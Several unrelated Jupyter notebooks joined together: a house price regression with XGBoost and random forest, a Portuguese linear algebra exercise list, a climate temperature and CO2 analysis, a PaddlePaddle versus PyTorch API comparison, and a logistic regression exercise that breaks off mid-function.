new_feature_names = ['Rooms_outlier', 'HouseFloor_outlier', 'HouseYear_outlier', 'LifeSquare_nan', 'DistrictSize',
'new_district', 'IsDistrictLarge', 'MedPriceByDistrict', 'MedPriceByFloorYear']
target_name = 'Price'
train_df = pd.read_csv(TRAIN_DATASET_PATH)
test_df = pd.read_csv(TEST_DATASET_PATH)
X = train_df.drop(columns=target_name)
y = train_df[target_name]
X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.33, shuffle=True, random_state=21)
preprocessor = DataPreprocessing()
preprocessor.fit(X_train)
X_train = preprocessor.transform(X_train)
X_valid = preprocessor.transform(X_valid)
test_df = preprocessor.transform(test_df)
X_train.shape, X_valid.shape, test_df.shape
features_gen = FeatureGenetator()
features_gen.fit(X_train, y_train)
X_train = features_gen.transform(X_train)
X_valid = features_gen.transform(X_valid)
test_df = features_gen.transform(test_df)
X_train.shape, X_valid.shape, test_df.shape
X_train = X_train[feature_names + new_feature_names]
X_valid = X_valid[feature_names + new_feature_names]
test_df = test_df[feature_names + new_feature_names]
X_train.isna().sum().sum(), X_valid.isna().sum().sum(), test_df.isna().sum().sum()
import xgboost as xgb
from xgboost_autotune import fit_parameters
from sklearn.metrics import make_scorer, accuracy_score
best_xgb_model = xgb.XGBRegressor(colsample_bytree=0.4,
gamma=0,
learning_rate=0.08,
max_depth=8,
min_child_weight=1.5,
# 10000
n_estimators=300,
reg_alpha=0.75,
reg_lambda=0.45,
subsample=0.6,
seed=42)
best_xgb_model.fit(X_train,y_train)
y_train_preds = best_xgb_model.predict(X_train)
y_test_preds = best_xgb_model.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
rf_model = RandomForestRegressor(random_state=21, criterion='mse')
rf_model.fit(X_train, y_train)
y_train_preds = rf_model.predict(X_train)
y_test_preds = rf_model.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
cv_score = cross_val_score(rf_model, X_train, y_train, scoring='r2', cv=KFold(n_splits=3, shuffle=True, random_state=21))
cv_score
cv_score.mean()
feature_importances = pd.DataFrame(list(zip(X_train.columns, rf_model.feature_importances_)),
columns=['feature_name', 'importance'])
feature_importances.sort_values(by='importance', ascending=False)
from sklearn.ensemble import StackingRegressor, VotingRegressor, BaggingRegressor, GradientBoostingRegressor
from sklearn.linear_model import LinearRegression
lr = LinearRegression()
gb = GradientBoostingRegressor()
stack = StackingRegressor([('lr', lr), ('rf', rf_model)], final_estimator=gb)
stack.fit(X_train, y_train)
y_train_preds = stack.predict(X_train)
y_test_preds = stack.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
test_df.shape
test_df
submit = pd.read_csv('sample_submission.csv')
submit.head()
best_xgb_model
# predictions = rf_model.predict(test_df)
predictions = best_xgb_model.predict(test_df)
predictions
submit['Price'] = predictions
submit.head()
submit.to_csv('rf_submit.csv', index=False)
| 0.403684 | 0.980949 |
# <font color='blue'>Data Science Academy</font>
# <font color='blue'>Matemรกtica Para Machine Learning</font>
## Lista de Exercรญcios - Capรญtulo 2
O objetivo desta lista de exercรญcios รฉ vocรช praticar os principais conceitos estudados neste capรญtulo, ao mesmo tempo que desenvolve suas habilidades em lรณgica de programaรงรฃo com a linguagem Python.
Caso tenha dรบvidas, isso รฉ absolutamente normal e faรงa um trabalho de pesquisa a fim de relembrar o formato das operaรงรตes matemรกticas.
Quando encontrar o formato de uma operaรงรฃo que resolva o exercรญcio proposto, use a linguagem Python para representar esta operaรงรฃo. Em essรชncia, รฉ assim que aplicamos Matemรกtica Para Machine Learning, construindo algoritmos e representando esses algoritmos em linguagem de programaรงรฃo.
Divirta-se!!
## Resolvendo Sistemas de Equaรงรตes em Python
Usando numpy, podemos resolver sistemas de equaรงรตes em Python. Cada equaรงรฃo em um sistema pode ser representada com matrizes. Por exemplo, se tivermos a equaรงรฃo 3x - 9y = -42, ela pode ser representada como [3, -9] e [-42]. Se adicionarmos outra equaรงรฃo, por exemplo, 2x + 4y = 2, podemos mesclar com a equaรงรฃo anterior para obter [[3, -9], [2, 4]] e [-42, 2]. Agora vamos resolver os valores x e y.
Primeiro, colocamos essas equaรงรตes em matrizes numpy:
```
import numpy as np
A = np.array([ [3,-9], [2,4] ])
b = np.array([-42,2])
```
Depois, usamos a funรงรฃo linalg.solve() para resolver os valores x e y, assim:
```
x, y = np.linalg.solve(A,b)
print("Os valores de x e y nas equaรงรตes acima sรฃo, respectivamente:", x, y)
```
### Exercรญcio 1 - Resolva o sistema de equaรงรตes:
# 1x + 1y = 35
# 2x + 4y = 94
```
# Soluรงรฃo
Mat1 = np.array([[1,1],[2,4]])
Mat2 = np.array([35,94])
x , y = np.linalg.solve(Mat1,Mat2)
print("Os valores de x e y nas equaรงรตes acima sรฃo, respectivamente:", x, y)
```
### Exercรญcio 2 - Resolva a equaรงรฃo quadrรกtica ax**2 + bx + c = 0 usando a fรณrmula matemรกtica
Dica 1: Solicite ao usuรกrio que digite os valores dos 3 coeficientes da equaรงรฃo (a, b e c) e resolva os valores de x.
Dica 2: Use a funรงรฃo sqrt() do pacote math
Dica 3: Fique atento aos possรญveis retornos da equaรงรฃo:
- Se d < 0: Sem soluรงรฃo em โ
- Se d = 0: A equaรงรฃo tem apenas uma soluรงรฃo em โ, x = โb2a
- Se d > 0: A equaรงรฃo tem duas soluรงรตes, x1 e x2
```
# Soluรงรฃo
from math import sqrt
a = float(input('digite o valor de a'))
b = float(input('digite o valor de b'))
c = float(input('digite o valor de c'))
delta = b**2-4*a*c
if delta < 0:
print('nรฃo existe soluรงรฃo real para a equaรงรฃo')
elif delta == 0:
x1 = (b *(-1) / 2*a)
print('A raiz da equรงรฃo รฉ:',x1)
else:
x1 = ((b *(-1) + sqrt(delta)) / 2*a)
x2 = ((b + sqrt(delta)) / 2*a)
print('as raizes sรฃo: ',x1 , x2)
```
### Exercรญcio 3 - Resolva a equaรงรฃo quadrรกtica ax**2 + bx + c = 0, criando uma funรงรฃo Python que receba os 3 coeficientes como parรขmetro
```
# Soluรงรฃo
```
### Exercรญcio 4 - Estude as funรงรตes matemรกticas em Python no link:
https://docs.python.org/3.6/library/math.html
### Exercรญcio 5 - Crie uma classe em Python para calcular um nรบmero elevado ao quadrado
Dica: Para testar, instancie a classe em um objeto, passando o nรบmero como parรขmetro
```
# Soluรงรฃo
```
### Exercรญcio 6 - Crie uma funรงรฃo em Python para resolver a equaรงรฃo quadrรกtica ax**2 + bx + c = 0, aplicando tratamento de erros
```
# Soluรงรฃo
```
### Exercรญcio 7 - Crie um Plot com a linha que representa a funรงรฃo linear
Dica 1: Funรงรฃo linear y = mx + b / y = ax + b
```
# Soluรงรฃo
```
### Exercรญcio 8 - Crie um Plot com a Parabola que representa a funรงรฃo quadrรกtica
```
# Soluรงรฃo
```
## Desafio - Questรตes 9 e 10
### Exercรญcio 9 - Crie uma funรงรฃo que calcule o slope e o intercepto (coeficientes m e b) da funรงรฃo linear estudada nas aulas anteriores, calcule e desenhe a linha que representa a funรงรฃo
Dica 1: Use dados dummy para x e y
Dica 2: A fรณrmula da funรงรฃo linear รฉ y = mx+b
```
# Soluรงรฃo
# Calcula a linha usando list comprehension
# Plot
```
### Exercรญcio 10 - Defina um novo valor de x e encontre o y correspondente
```
# Soluรงรฃo
# Novo valor de x
# Prevendo o valor de y
# Plot
```
## Fim
|
github_jupyter
|
import numpy as np
A = np.array([ [3,-9], [2,4] ])
b = np.array([-42,2])
x, y = np.linalg.solve(A,b)
print("Os valores de x e y nas equaรงรตes acima sรฃo, respectivamente:", x, y)
# Soluรงรฃo
Mat1 = np.array([[1,1],[2,4]])
Mat2 = np.array([35,94])
x , y = np.linalg.solve(Mat1,Mat2)
print("Os valores de x e y nas equaรงรตes acima sรฃo, respectivamente:", x, y)
# Soluรงรฃo
from math import sqrt
a = float(input('digite o valor de a'))
b = float(input('digite o valor de b'))
c = float(input('digite o valor de c'))
delta = b**2-4*a*c
if delta < 0:
print('nรฃo existe soluรงรฃo real para a equaรงรฃo')
elif delta == 0:
x1 = (b *(-1) / 2*a)
print('A raiz da equรงรฃo รฉ:',x1)
else:
x1 = ((b *(-1) + sqrt(delta)) / 2*a)
x2 = ((b + sqrt(delta)) / 2*a)
print('as raizes sรฃo: ',x1 , x2)
# Soluรงรฃo
# Soluรงรฃo
# Soluรงรฃo
# Soluรงรฃo
# Soluรงรฃo
# Soluรงรฃo
# Calcula a linha usando list comprehension
# Plot
# Soluรงรฃo
# Novo valor de x
# Prevendo o valor de y
# Plot
| 0.214856 | 0.991032 |
# Climate Change and CO2 levels in atmosphere
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
data_country = pd.read_csv("../TERN/Data Analysis/Climate Change/Climate Change Earth Surface Temperature Data/GlobalLandTemperaturesByCountry.csv")
data_india = data_country[data_country["Country"] == "India"].copy()
data_india["dt"] = pd.to_datetime(data_india["dt"])
data_global = pd.read_csv("../TERN/Data Analysis/Climate Change/Climate Change Earth Surface Temperature Data/GlobalTemperatures.csv")
data_global["dt"] = pd.to_datetime(data_global["dt"])
data_global.head()
data_global.info()
data_global.describe()
plt.figure(figsize = (20, 6))
annual_mean_global = data_global.groupby(data_global["dt"].dt.year).mean()
sns.set_context("poster", font_scale=0.8)
annual_mean_global.loc[1960:2013]["LandAndOceanAverageTemperature"].plot(grid=True)
plt.legend()
plt.title("Annual Global Land and Ocean Average Temperature")
plt.xlabel('Years')
plt.ylabel("Average Temperature")
plt.show()
data_india.head()
data_india.info()
data_india.describe()
plt.figure(figsize = (20, 6))
sns.set_context("poster", font_scale=0.8)
annual_mean_india = data_india.groupby(data_india["dt"].dt.year).mean()
annual_mean_india.loc[1960:2013]["AverageTemperature"].plot(grid=True)
plt.legend()
plt.title("Annual India Land and Ocean Average Temperature")
plt.xlabel('Years')
plt.ylabel("Average Temperature")
plt.show()
annual_mean_global = data_global.groupby(data_global["dt"].dt.year).mean()
reference_temperature_global = annual_mean_global.loc[1951:1980].mean()["LandAndOceanAverageTemperature"]
annual_mean_global["Temperature Anomaly"] = annual_mean_global["LandAndOceanAverageTemperature"] - reference_temperature_global
annual_mean_india = data_india.groupby(data_india["dt"].dt.year).mean()
reference_temperature_india = annual_mean_india.loc[1951:1980].mean()["AverageTemperature"]
annual_mean_india["Temperature Anomaly"] = annual_mean_india["AverageTemperature"] - reference_temperature_india
```
Calculated the mean temperature for the period 1951 - 1980 period to establish the global base mean temperature. In climate change studies, temperature anomalies are more important than absolute temperature. A temperature anomaly is the difference from an average, or baseline, temperature. The baseline temperature is typically computed by averaging 30 or more years of temperature data. A positive anomaly indicates the observed temperature was warmer than the baseline, while a negative anomaly indicates the observed temperature was cooler than the baseline. This is standard practice in climate science. The deviation from this temperature is added in the Temperature Anomaly column.
Resource- https://www.ncdc.noaa.gov/monitoring-references/dyk/anomalies-vs-temperature
```
plt.figure(figsize = (20, 6))
annual_mean_global.loc[1960:2013]["Temperature Anomaly"].plot(grid=True)
sns.set_context("poster", font_scale=0.8)
plt.title("Annual Global anomaly from base mean temperature")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend()
plt.show()
```
Temperature anomaly of about 0.75 celsius in 2015 which reached the all time high.
```
plt.figure(figsize = (20, 6))
annual_mean_india.loc[1960:2015]["Temperature Anomaly"].plot(grid=True)
sns.set_context("poster", font_scale=0.8)
plt.title("Annual anomaly from base mean temperature in India")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend(loc = "upper left")
plt.show()
```
The temperature has also steadily increased in India.
```
plt.figure(figsize = (20, 6))
annual_mean_global.loc[1960:2015]["Temperature Anomaly"].plot(grid=True, label = "World")
annual_mean_india.loc[1960:2015]["Temperature Anomaly"].plot(grid=True, label = "India")
sns.set_context("poster", font_scale=0.8)
plt.title("Comparison of annual anomaly from base mean temperature in India and World")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend()
plt.show()
```
# Climate Change and CO2 levels
```
co2_ppm = pd.read_csv("C:/Users/Nihal Reddy/Desktop/FILES/TERN/Data Analysis/Climate Change/Carbon Dioxide Levels in Atmosphere/archive.csv")
co2_ppm.head()
plt.figure(figsize = (15, 8))
sns.set_context("poster", font_scale=0.8)
annual_co2_ppm = co2_ppm.groupby(co2_ppm["Year"]).mean()
annual_co2_ppm.loc[1960:2017]["Carbon Dioxide (ppm)"].plot(grid=True, legend=True)
plt.title("Global CO2 levels in Atmosphere")
plt.ylabel("CO2 parts per million")
plt.show()
```
The CO2 levels in the atmosphere have risen in the 1960-2017 period, indicating a linear relation between greenhouse gases and global temperature.
```
annual_co2_temp = pd.merge(annual_mean_global.loc[1960:2015], annual_co2_ppm.loc[1960:2015], left_index=True, right_index=True)
annual_co2_temp = annual_co2_temp[["LandAndOceanAverageTemperature", "Temperature Anomaly", "Carbon Dioxide (ppm)"]].copy()
annual_co2_temp.corr()
```
The correlation coefficient of CO2 and temperature anomaly is 0.92 , confirming the linear relation between the two variables.
```
plt.figure(figsize=(15, 10))
sns.set_context("poster", font_scale=0.8)
sns.scatterplot(x="Temperature Anomaly",y="Carbon Dioxide (ppm)", data=annual_co2_temp)
```
This scatter plot visualizes the linear relation between CO2 levels and temperature anomaly. Changes in global mean temperatures, as well as the rise of CO2 concentrations in atmosphere.
|
github_jupyter
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
data_country = pd.read_csv("../TERN/Data Analysis/Climate Change/Climate Change Earth Surface Temperature Data/GlobalLandTemperaturesByCountry.csv")
data_india = data_country[data_country["Country"] == "India"].copy()
data_india["dt"] = pd.to_datetime(data_india["dt"])
data_global = pd.read_csv("../TERN/Data Analysis/Climate Change/Climate Change Earth Surface Temperature Data/GlobalTemperatures.csv")
data_global["dt"] = pd.to_datetime(data_global["dt"])
data_global.head()
data_global.info()
data_global.describe()
plt.figure(figsize = (20, 6))
annual_mean_global = data_global.groupby(data_global["dt"].dt.year).mean()
sns.set_context("poster", font_scale=0.8)
annual_mean_global.loc[1960:2013]["LandAndOceanAverageTemperature"].plot(grid=True)
plt.legend()
plt.title("Annual Global Land and Ocean Average Temperature")
plt.xlabel('Years')
plt.ylabel("Average Temperature")
plt.show()
data_india.head()
data_india.info()
data_india.describe()
plt.figure(figsize = (20, 6))
sns.set_context("poster", font_scale=0.8)
annual_mean_india = data_india.groupby(data_india["dt"].dt.year).mean()
annual_mean_india.loc[1960:2013]["AverageTemperature"].plot(grid=True)
plt.legend()
plt.title("Annual India Land and Ocean Average Temperature")
plt.xlabel('Years')
plt.ylabel("Average Temperature")
plt.show()
annual_mean_global = data_global.groupby(data_global["dt"].dt.year).mean()
reference_temperature_global = annual_mean_global.loc[1951:1980].mean()["LandAndOceanAverageTemperature"]
annual_mean_global["Temperature Anomaly"] = annual_mean_global["LandAndOceanAverageTemperature"] - reference_temperature_global
annual_mean_india = data_india.groupby(data_india["dt"].dt.year).mean()
reference_temperature_india = annual_mean_india.loc[1951:1980].mean()["AverageTemperature"]
annual_mean_india["Temperature Anomaly"] = annual_mean_india["AverageTemperature"] - reference_temperature_india
plt.figure(figsize = (20, 6))
annual_mean_global.loc[1960:2013]["Temperature Anomaly"].plot(grid=True)
sns.set_context("poster", font_scale=0.8)
plt.title("Annual Global anomaly from base mean temperature")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend()
plt.show()
plt.figure(figsize = (20, 6))
annual_mean_india.loc[1960:2015]["Temperature Anomaly"].plot(grid=True)
sns.set_context("poster", font_scale=0.8)
plt.title("Annual anomaly from base mean temperature in India")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend(loc = "upper left")
plt.show()
plt.figure(figsize = (20, 6))
annual_mean_global.loc[1960:2015]["Temperature Anomaly"].plot(grid=True, label = "World")
annual_mean_india.loc[1960:2015]["Temperature Anomaly"].plot(grid=True, label = "India")
sns.set_context("poster", font_scale=0.8)
plt.title("Comparison of annual anomaly from base mean temperature in India and World")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend()
plt.show()
co2_ppm = pd.read_csv("C:/Users/Nihal Reddy/Desktop/FILES/TERN/Data Analysis/Climate Change/Carbon Dioxide Levels in Atmosphere/archive.csv")
co2_ppm.head()
plt.figure(figsize = (15, 8))
sns.set_context("poster", font_scale=0.8)
annual_co2_ppm = co2_ppm.groupby(co2_ppm["Year"]).mean()
annual_co2_ppm.loc[1960:2017]["Carbon Dioxide (ppm)"].plot(grid=True, legend=True)
plt.title("Global CO2 levels in Atmosphere")
plt.ylabel("CO2 parts per million")
plt.show()
annual_co2_temp = pd.merge(annual_mean_global.loc[1960:2015], annual_co2_ppm.loc[1960:2015], left_index=True, right_index=True)
annual_co2_temp = annual_co2_temp[["LandAndOceanAverageTemperature", "Temperature Anomaly", "Carbon Dioxide (ppm)"]].copy()
annual_co2_temp.corr()
plt.figure(figsize=(15, 10))
sns.set_context("poster", font_scale=0.8)
sns.scatterplot(x="Temperature Anomaly",y="Carbon Dioxide (ppm)", data=annual_co2_temp)
| 0.446253 | 0.864939 |
```
import os
import sys
import cv2
import numpy as np
import torch
import torchvision
import paddle
import matplotlib.pyplot as plt
%matplotlib inline
print(paddle.__version__)
print(torch.__version__)
conv_paddle = paddle.nn.Conv2D(
in_channels=3,
out_channels=4,
kernel_size=1,
stride=1)
conv_torch = paddle.nn.Conv2D(
in_channels=3,
out_channels=4,
kernel_size=1,
stride=1)
print(conv_paddle)
print(conv_torch)
linear_paddle = paddle.nn.Linear(
in_features=10,
out_features=20)
linear_torch = torch.nn.Linear(
in_features=10,
out_features=20)
print(linear_paddle)
print(linear_torch)
print("====linear_paddle info====")
for name, weight in linear_paddle.named_parameters():
print(name, weight.shape)
print("\n====linear_torch info====")
for name, weight in linear_torch.named_parameters():
print(name, weight.shape)
# ไธ่ฝฝๅฐ้ป่ฎค่ทฏๅพ
dataset_paddle = paddle.vision.datasets.Cifar10(
mode="train",
download=True)
# ไธ่ฝฝๅฐdata็ฎๅฝ
dataset_torch = torchvision.datasets.CIFAR10(
root="./data",
train=True,
download=True)
print(dataset_paddle)
print(dataset_torch)
print("paddle length: ", len(dataset_paddle))
print("torch length: ", len(dataset_torch))
plt.subplot(121)
plt.imshow(dataset_paddle[0][0])
plt.subplot(122)
plt.imshow(dataset_paddle[1][0])
plt.show()
x = np.random.rand(32, 10).astype(np.float32)
label = np.random.randint(0, 10, [32, ], dtype=np.int64)
ce_loss_paddle = paddle.nn.CrossEntropyLoss()
ce_loss_torch = torch.nn.CrossEntropyLoss()
loss_paddle = ce_loss_paddle(
paddle.to_tensor(x),
paddle.to_tensor(label))
loss_torch = ce_loss_torch(
torch.from_numpy(x),
torch.from_numpy(label))
print(loss_paddle)
print(loss_torch)
x = np.random.rand(4, 10).astype(np.float32)
label = np.random.randint(0, 10, [4, ], dtype=np.int64)
score_paddle, cls_id_paddle = paddle.topk(paddle.to_tensor(x), k=1)
score_torch, cls_id_torch = torch.topk(torch.from_numpy(x), k=1)
print("====class ids diff=====")
print(cls_id_paddle.numpy().tolist())
print(cls_id_torch.numpy().tolist())
print("\n====socres diff=====")
print(score_paddle.numpy().tolist())
print(score_torch.numpy().tolist())
linear_paddle = paddle.nn.Linear(10, 10)
lr_sch_paddle = paddle.optimizer.lr.StepDecay(
0.1,
step_size=1,
gamma=0.1)
opt_paddle = paddle.optimizer.Momentum(
learning_rate=lr_sch_paddle,
parameters=linear_paddle.parameters(),
weight_decay=0.01)
linear_torch = torch.nn.Linear(10, 10)
opt_torch = torch.optim.SGD(
linear_torch.parameters(),
lr=0.1,
momentum=0.9,
weight_decay=0.1)
lr_sch_torch = torch.optim.lr_scheduler.StepLR(
opt_torch,
step_size=1, gamma=0.1)
for idx in range(1, 4):
lr_sch_paddle.step()
lr_sch_torch.step()
print("step {}, paddle lr: {:.6f}, torch lr: {:.6f}".format(
idx,
lr_sch_paddle.get_lr(),
lr_sch_torch.get_lr()[0]))
class PaddleModel(paddle.nn.Layer):
def __init__(self):
super().__init__()
self.conv = paddle.nn.Conv2D(
in_channels=3,
out_channels=12,
kernel_size=3,
padding=1,
dilation=0)
self.bn = paddle.nn.BatchNorm2D(12)
self.relu = paddle.nn.ReLU()
self.maxpool = paddle.nn.MaxPool2D(
kernel_size=3,
stride=2,
padding=1)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
x = self.maxpool(x)
return x
class TorchModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv = torch.nn.Conv2d(
in_channels=3,
out_channels=12,
kernel_size=3,
padding=1)
self.bn = torch.nn.BatchNorm2d(12)
self.relu = torch.nn.ReLU()
self.maxpool = torch.nn.MaxPool2d(
kernel_size=3,
stride=2,
padding=1)
def forward(self, x):
x = self.conv_layer(x)
x = self.bn_layer(x)
x = self.relu(x)
x = self.maxpool(x)
return x
paddle_model = PaddleModel()
torch_model = TorchModel()
print(paddle_model)
print(torch_model)
print("====paddle names====")
print(list(paddle_model.state_dict().keys()))
print("\n====torch names====")
print(list(torch_model.state_dict().keys()))
def clip_funny(x, minv, maxv):
midv = (minv + maxv) / 2.0
cond1 = paddle.logical_and(x > minv, x < midv)
cond2 = paddle.logical_and(x >= midv, x < maxv)
y = paddle.where(cond1, paddle.ones_like(x) * minv, x)
y = paddle.where(cond2, paddle.ones_like(x) * maxv, y)
return y
x = paddle.to_tensor([1, 2, 2.5, 2.6, 3, 3.5])
y = clip_funny(x, 2, 3)
print(y)
```
|
github_jupyter
|
import os
import sys
import cv2
import numpy as np
import torch
import torchvision
import paddle
import matplotlib.pyplot as plt
%matplotlib inline
print(paddle.__version__)
print(torch.__version__)
conv_paddle = paddle.nn.Conv2D(
in_channels=3,
out_channels=4,
kernel_size=1,
stride=1)
conv_torch = paddle.nn.Conv2D(
in_channels=3,
out_channels=4,
kernel_size=1,
stride=1)
print(conv_paddle)
print(conv_torch)
linear_paddle = paddle.nn.Linear(
in_features=10,
out_features=20)
linear_torch = torch.nn.Linear(
in_features=10,
out_features=20)
print(linear_paddle)
print(linear_torch)
print("====linear_paddle info====")
for name, weight in linear_paddle.named_parameters():
print(name, weight.shape)
print("\n====linear_torch info====")
for name, weight in linear_torch.named_parameters():
print(name, weight.shape)
# ไธ่ฝฝๅฐ้ป่ฎค่ทฏๅพ
dataset_paddle = paddle.vision.datasets.Cifar10(
mode="train",
download=True)
# ไธ่ฝฝๅฐdata็ฎๅฝ
dataset_torch = torchvision.datasets.CIFAR10(
root="./data",
train=True,
download=True)
print(dataset_paddle)
print(dataset_torch)
print("paddle length: ", len(dataset_paddle))
print("torch length: ", len(dataset_torch))
plt.subplot(121)
plt.imshow(dataset_paddle[0][0])
plt.subplot(122)
plt.imshow(dataset_paddle[1][0])
plt.show()
x = np.random.rand(32, 10).astype(np.float32)
label = np.random.randint(0, 10, [32, ], dtype=np.int64)
ce_loss_paddle = paddle.nn.CrossEntropyLoss()
ce_loss_torch = torch.nn.CrossEntropyLoss()
loss_paddle = ce_loss_paddle(
paddle.to_tensor(x),
paddle.to_tensor(label))
loss_torch = ce_loss_torch(
torch.from_numpy(x),
torch.from_numpy(label))
print(loss_paddle)
print(loss_torch)
x = np.random.rand(4, 10).astype(np.float32)
label = np.random.randint(0, 10, [4, ], dtype=np.int64)
score_paddle, cls_id_paddle = paddle.topk(paddle.to_tensor(x), k=1)
score_torch, cls_id_torch = torch.topk(torch.from_numpy(x), k=1)
print("====class ids diff=====")
print(cls_id_paddle.numpy().tolist())
print(cls_id_torch.numpy().tolist())
print("\n====socres diff=====")
print(score_paddle.numpy().tolist())
print(score_torch.numpy().tolist())
linear_paddle = paddle.nn.Linear(10, 10)
lr_sch_paddle = paddle.optimizer.lr.StepDecay(
0.1,
step_size=1,
gamma=0.1)
opt_paddle = paddle.optimizer.Momentum(
learning_rate=lr_sch_paddle,
parameters=linear_paddle.parameters(),
weight_decay=0.01)
linear_torch = torch.nn.Linear(10, 10)
opt_torch = torch.optim.SGD(
linear_torch.parameters(),
lr=0.1,
momentum=0.9,
weight_decay=0.1)
lr_sch_torch = torch.optim.lr_scheduler.StepLR(
opt_torch,
step_size=1, gamma=0.1)
for idx in range(1, 4):
lr_sch_paddle.step()
lr_sch_torch.step()
print("step {}, paddle lr: {:.6f}, torch lr: {:.6f}".format(
idx,
lr_sch_paddle.get_lr(),
lr_sch_torch.get_lr()[0]))
class PaddleModel(paddle.nn.Layer):
def __init__(self):
super().__init__()
self.conv = paddle.nn.Conv2D(
in_channels=3,
out_channels=12,
kernel_size=3,
padding=1,
dilation=0)
self.bn = paddle.nn.BatchNorm2D(12)
self.relu = paddle.nn.ReLU()
self.maxpool = paddle.nn.MaxPool2D(
kernel_size=3,
stride=2,
padding=1)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
x = self.maxpool(x)
return x
class TorchModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv = torch.nn.Conv2d(
in_channels=3,
out_channels=12,
kernel_size=3,
padding=1)
self.bn = torch.nn.BatchNorm2d(12)
self.relu = torch.nn.ReLU()
self.maxpool = torch.nn.MaxPool2d(
kernel_size=3,
stride=2,
padding=1)
def forward(self, x):
x = self.conv_layer(x)
x = self.bn_layer(x)
x = self.relu(x)
x = self.maxpool(x)
return x
paddle_model = PaddleModel()
torch_model = TorchModel()
print(paddle_model)
print(torch_model)
print("====paddle names====")
print(list(paddle_model.state_dict().keys()))
print("\n====torch names====")
print(list(torch_model.state_dict().keys()))
def clip_funny(x, minv, maxv):
midv = (minv + maxv) / 2.0
cond1 = paddle.logical_and(x > minv, x < midv)
cond2 = paddle.logical_and(x >= midv, x < maxv)
y = paddle.where(cond1, paddle.ones_like(x) * minv, x)
y = paddle.where(cond2, paddle.ones_like(x) * maxv, y)
return y
x = paddle.to_tensor([1, 2, 2.5, 2.6, 3, 3.5])
y = clip_funny(x, 2, 3)
print(y)
| 0.68658 | 0.506713 |
### Programming Exercise 2: Logistic Regression
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
```
### 1 Logistic Regression
```
!ls ../../2_logistic_regression/logistic_reg_new/
data = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data1.txt', delimiter=',')
X = data[:, 0:2]
X = np.insert(X, 0, 1, axis=1)
y = data[:, -1]
m = y.shape[0]
```
#### 1.1 Visualizing the data
```
pos = np.where(y==1)
neg = np.where(y==0)
def plotData():
plt.figure(figsize=(10, 6))
plt.plot(X[pos][:, 1], X[pos][:, 2], 'k+', label='Admitted')
plt.plot(X[neg][:, 1], X[neg][:, 2], 'yo', label='Not Admitted')
# plt.grid(True)
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend()
plotData()
```
#### 1.2 Implementation
```
from scipy.special import expit # sigmoid function
myx = np.arange(-10, 10, .1)
plt.plot(myx, expit(myx))
plt.grid(True)
# Hypothesis function
def h(mytheta, myX):
return expit(np.dot(myX, mytheta))
# Cost function
def computeCost(mytheta, myX, myy, mylambda = 0.):
term1 = np.dot(-np.array(myy).T, np.log(h(mytheta, myX))) # y=1
term2 = np.dot((1-np.array(myy)).T, np.log(1-h(mytheta, myX))) # y=0
regterm = (mylambda/2) * np.sum(np.dot(mytheta[1:].T, mytheta[1:]))
return float((1./m)*(np.sum(term1-term2)+regterm))
initial_theta = np.zeros((X.shape[1], 1))
computeCost(initial_theta, X, y)
from scipy import optimize
def optimizeTheta(mytheta, myX, myy, mylambda=0.):
result = optimize.fmin(computeCost, x0=mytheta, args=(myX, myy, mylambda), maxiter=400, full_output=True)
return result[0], result[1]
theta, mincost = optimizeTheta(initial_theta, X, y)
print(computeCost(theta, X, y))
theta
boundary_xs = np.array([np.min(X[:, 1]), np.max(X[:, 1])])
boundary_ys = (-1/theta[2])*(theta[0]+theta[1]*boundary_xs)
plotData()
plt.plot(boundary_xs, boundary_ys, 'b-', label='Decision Boundary')
plt.legend()
print(h(theta, np.array([1, 45., 85.])))
def makePrediction(mytheta, myx):
return h(mytheta, myx) >= 0.5
pos_correct = float(np.sum(makePrediction(theta, X[pos])))
neg_correct = float(np.sum(np.invert(makePrediction(theta, X[neg]))))
tot = X[pos].shape[0]+X[neg].shape[0]
prcnt_correct = float(pos_correct+neg_correct)/tot
print('training set correctly predicted %f' % prcnt_correct)
```
### 2 Regularized Logistic Regerssion
#### 2.1 Visualizing the data
```
cols = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data2.txt', delimiter=',', usecols=(0, 1, 2), unpack=True)
X = np.transpose(np.array(cols[:-1]))
y = np.transpose(np.array(cols[-1:]))
m = y.size
X = np.insert(X, 0, 1, axis=1)
pos = np.array([X[i] for i in range(X.shape[0]) if y[i]==1]) # np[np.where(y==1)]
neg = np.array([X[i] for i in range(X.shape[0]) if y[i]==0])
def plotData():
plt.plot(pos[:, 1], pos[:, 2], 'k+', label='y=1')
plt.plot(neg[:, 1], neg[:, 2], 'yo', label='y=0')
plt.xlabel('Microchip Test 1')
plt.ylabel('Microchip Test 2')
plt.legend()
# plt.grid(True)
plt.figure(figsize=(8, 8))
plotData()
```
#### 2.2 Feature mapping
```
def mapFeature(degrees,x1col, x2col):
# degrees = 2
out = np.ones((x1col.shape[0], 1))
for i in range(1, degrees+1):
for j in range(0, i+1):
term1 = x1col ** (i-j)
term2 = x2col ** (j)
term = (term1*term2).reshape(term1.shape[0], 1)
out = np.hstack((out, term))
return out
mappedX = mapFeature(6, X[:, 1], X[:, 2])
mappedX.shape
initial_theta = np.zeros((mappedX.shape[1], 1))
computeCost(initial_theta, mappedX, y)
def optimizeRegularizedTheata(mytheta, myX, myy, mylambda=0.):
